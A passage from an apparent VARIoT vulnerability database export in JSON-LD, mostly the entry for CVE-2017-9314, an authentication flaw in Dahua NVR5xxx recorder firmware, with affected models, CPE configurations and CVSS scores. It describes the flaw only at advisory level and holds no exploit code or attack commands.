},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-554"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dahua Input verification vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003799"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-554"
}
],
"trust": 0.6
}
}
VAR-201711-1046
Vulnerability from variot - Updated: 2023-12-18 13:24Authentication vulnerability found in Dahua NVR models NVR50XX, NVR52XX, NVR54XX, NVR58XX with software before DH_NVR5xxx_Eng_P_V2.616.0000.0.R.20171102. Attacker could exploit this vulnerability to gain access to additional operations by means of forging json message. Dahua NVR The model software contains authentication vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. DahuaNVR50XX and so on are all Dahua's network hard disk camera products. There are security vulnerabilities in several Dahua products
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201711-1046",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "nvr5232-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5232_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5216-8p-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5216_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5224-24p-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5224_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5432-16p-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5432_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5416-16p-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5416_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5232-8p-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5232_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5216-16p-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5216_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5208-8p-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5208_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5832-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5832_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5208-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5208_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5832-16p-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5832_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5816-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5816_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5816-16p-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5816_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5216-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5216_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5464-16p-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5464_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5232-16p-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5232_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5416-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5416_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5864-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5864_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5432-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5432_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5464-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5464_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5424-24p-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5424_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5864-16p-4ks2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_nvr5864_eng_p_v2.616.0000.0.r.20171102"
},
{
"model": "nvr5208-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr5208-8p-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr5216-16p-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr5216-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr5216-8p-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr5224-24p-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr5232-16p-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr5232-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr5232-8p-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr5416-16p-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr5416-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr5424-24p-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr5432-16p-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr5432-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr5464-16p-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr5464-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr5816-16p-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr5816-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr5832-16p-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr5832-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr5864-16p-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr5864-4ks2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "security dh nvr5xxx \u003ceng p v2.616.0000.0.r.20171102",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "security nvr52xx \u003cdh nvr5xxx eng p v2.616.0000.0.r.20171102",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "security nvr54xx \u003cdh nvr5xxx eng p v2.616.0000.0.r.20171102",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "security nvr58xx \u003cdh nvr5xxx eng p v2.616.0000.0.r.20171102",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36534"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-010134"
},
{
"db": "NVD",
"id": "CVE-2017-9314"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5464-16p-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5464_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5464-16p-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5208-8p-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5208_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5208-8p-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5432-16p-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5432_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5432-16p-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5416-16p-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5416_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5416-16p-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5464-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5464_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5464-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5432-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5432_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5432-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5416-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5416_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5416-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5232-16p-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5232_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5232-16p-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5216-16p-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5216_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5216-16p-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5232-8p-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5232_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5232-8p-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5216-8p-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5216_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5216-8p-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5232-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5232_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5232-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5216-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5216_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5216-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5208-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5208_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5208-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5816-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5816_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5816-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5832-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5832_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5832-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5864-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5864_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5864-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5864-16p-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5864_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5864-16p-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5832-16p-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5832_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5832-16p-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5816-16p-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5816_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5816-16p-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5424-24p-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5424_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5424-24p-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5224-24p-4ks2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_nvr5224_eng_p_v2.616.0000.0.r.20171102",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5224-24p-4ks2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-9314"
}
]
},
"cve": "CVE-2017-9314",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-9314",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CNVD-2017-36534",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-9314",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-9314",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-36534",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201705-1394",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36534"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-010134"
},
{
"db": "NVD",
"id": "CVE-2017-9314"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-1394"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Authentication vulnerability found in Dahua NVR models NVR50XX, NVR52XX, NVR54XX, NVR58XX with software before DH_NVR5xxx_Eng_P_V2.616.0000.0.R.20171102. Attacker could exploit this vulnerability to gain access to additional operations by means of forging json message. Dahua NVR The model software contains authentication vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. DahuaNVR50XX and so on are all Dahua\u0027s network hard disk camera products. There are security vulnerabilities in several Dahua products",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-9314"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-010134"
},
{
"db": "CNVD",
"id": "CNVD-2017-36534"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-9314",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-010134",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2017-36534",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201705-1394",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36534"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-010134"
},
{
"db": "NVD",
"id": "CVE-2017-9314"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-1394"
}
]
},
"id": "VAR-201711-1046",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36534"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
